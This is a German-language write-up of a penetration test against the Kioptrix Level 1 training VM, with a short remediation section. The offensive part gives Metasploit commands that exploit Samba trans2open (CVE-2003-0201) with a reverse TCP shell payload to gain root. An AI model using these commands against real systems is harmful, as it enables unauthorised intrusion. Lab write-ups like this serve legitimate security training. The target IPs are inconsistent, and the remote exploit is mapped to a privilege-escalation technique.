Kioptrix Level 1: Vollspektrum-Schwachstellenprüfung und -ausnutzung
🏛️ Professionelle Zielsetzung
Ziel war es, einen strukturierten Penetrationstest auf der Umgebung Kioptrix Level 1 durchzuführen, um eine vollständige ‚root‘-Kompromittierung zu erreichen und technische Abhilfestrategien zu dokumentieren, die sowohl für Red- als auch Blue-Team-Operationen geeignet sind.
🏗️ Umgebungsreproduktion (Hardware-Hintergrund)
Moderne Virtualisierungsstandardvorgaben scheitern oft an veralteten Kerneln von 2010. Um diese Maschine erfolgreich zu booten und zu vernetzen, waren die folgenden spezifischen Architekturkonfigurationen erforderlich:
- OS-Untertyp: Linux / Red Hat (32-bit).
- Speicherarchitektur: Wechsel von SATA auf IDE-Controller zur Unterstützung der veralteten .vmdk-Festplatte.
- Netzwerkprotokoll: Konfiguriert als PCI FAST-III mit einem Host-only-Adapter, um die interne Kommunikation mit der Kali Linux Angriffsmaschine zu ermöglichen.
⚔️ Offensive Analyse (Red-Team-Pfad)
Die Ausnutzung folgte einem manuellen Lebenszyklus von Enumeration bis Exploitation:
1. Entdeckung und Aufklärung
- Netdiscover:
netdiscover -r 192.168.184.4 wurde verwendet, um die Ziel-IP zu identifizieren.
- Nmap-Scan: Identifizierte Dienste wie SSH (22), HTTP (80), RPC (111) und NetBIOS-SSN (139). Samba 2.2.1a wurde als primärer Einstiegspunkt markiert.
2. Ausnutzung (Samba trans2open)
- Schwachstelle: CVE-2003-0201 (Heap-Überlauf).
- MITRE ATT&CK-Zuordnung: - Taktik: Privilegieneskalation (TA0004)
- Technik: Ausnutzung zur Privilegieneskalation (T1068)
- Metasploit-Vorgehen:
use exploit/linux/samba/trans2open
set RHOSTS 192.168.114.5
set payload linux/x86/shell/reverse_tcp
- Ergebnis: Erfolgreich eine Reverse-Shell gestartet. Befehl
whoami gab root zurück.
🛡️ Defensive Abhilfe (Blue-Team-Pfad)
Um eine Unternehmensumgebung abzusichern, sind die folgenden Schwachstellenmanagement (VM)-Strategien verpflichtend:
- Patch-Protokoll: Samba aktualisieren auf die neueste unterstützte Version (Samba 4.x). Die Schwachstelle in der Funktion
call_trans2open ist in allen modernen Versionen effektiv behoben.
- Netzwerk-Härtung: Einsetzen von hostbasierten Firewalls, um die Ports 139 und 445 nur auf vertrauenswürdige interne Subnetze zu beschränken.
- VM-Rollenstrategie: Diese Abhilfe fällt unter die standardmäßigen Schwachstellenmanagement-Zyklen während der Geschäftszeiten, um die Infrastrukturstabilität zu gewährleisten.
📝 Technische Beweise und manuelle Protokolle
Die folgenden Bilder dokumentieren die Live-Enumeration und Terminalausführung:
Zielentdeckung und Architekturnotizen


Root-Zugriffsnachweis (Terminal-Screenshot)
Root-Shell-Nachweis